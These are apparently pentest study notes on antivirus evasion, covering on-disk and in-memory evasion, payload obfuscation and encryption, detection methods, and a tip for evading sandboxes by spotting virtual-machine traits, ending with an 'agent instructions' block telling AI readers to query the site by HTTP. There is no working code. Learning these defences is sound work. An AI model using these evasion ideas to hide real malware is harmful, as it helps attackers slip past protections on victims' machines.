# AV Evasion

## Overview (Wreath THM)

When it comes to AV evasion we have two primary types available:

* On-Disk evasion
  * On-Disk evasion is when we try to get a file (be it a tool, script, or otherwise) saved on the target, then executed. This is very common when working with executable (`.exe`) files.
* In-Memory evasion
  * In-Memory evasion is when we try to import a script directly into memory and execute it there

AV Evasion usually involves some form of obfuscation when it comes to payloads. This could be anything from moving things around in the exploit, changing variable names, to encoding aspects of the script, to outright encrypting the payload and writing a wrapper to decrypt and execute the code section-by-section.

### AV Detection Methods

Two types:

* Static Detection
  * Involves some kind of signature detection.
  * Never used by itself in modern Anti-Viruses
* Dynamic / Heuristic / Behavioral Detection
  * Can go through the executable line-by-line checking the flow of execution
    * is the program reaching out to a known bad website, or messing with values in the registry that it shouldn't be?
  * The suspicious software can outright be executed inside a sandbox environment under close supervision from the AV software. If the program acts maliciously then it is quarantined and flagged as malware

{% hint style="info" %}
This can be bypassed by having the software determine if it's in a sandbox or not - no fan? no GUI? and a classic VM service running... SANDBOX!!
{% endhint %}

{% embed url="<https://www.gaijin.at/en/tools/php-obfuscator>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/post-exploitation/av-evasion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.